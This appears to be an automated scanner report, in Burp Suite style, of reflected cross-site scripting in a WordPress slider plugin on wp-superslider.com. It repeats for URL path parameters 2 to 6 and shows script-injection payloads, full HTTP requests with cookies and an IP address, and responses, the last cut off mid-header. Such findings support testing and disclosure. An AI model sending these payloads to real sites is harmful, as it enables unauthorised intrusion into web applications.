The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574e5"><script>alert(1)</script>2452676616d was submitted in the REST URL parameter 2. This input was echoed as 574e5\"><script>alert(1)</script>2452676616d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content574e5"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f714"><script>alert(1)</script>39a0a2ffe53 was submitted in the REST URL parameter 3. This input was echoed as 2f714\"><script>alert(1)</script>39a0a2ffe53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2f714"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda27"><script>alert(1)</script>618a4ef6632 was submitted in the REST URL parameter 4. This input was echoed as fda27\"><script>alert(1)</script>618a4ef6632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincatfda27"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad888"><script>alert(1)</script>85bc6e4dd3f was submitted in the REST URL parameter 5. This input was echoed as ad888\"><script>alert(1)</script>85bc6e4dd3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-dataad888"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bf9"><script>alert(1)</script>06d6b0fc251 was submitted in the REST URL parameter 6. This input was echoed as 95bf9\"><script>alert(1)</script>06d6b0fc251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT Connection: close Content-Type: text/h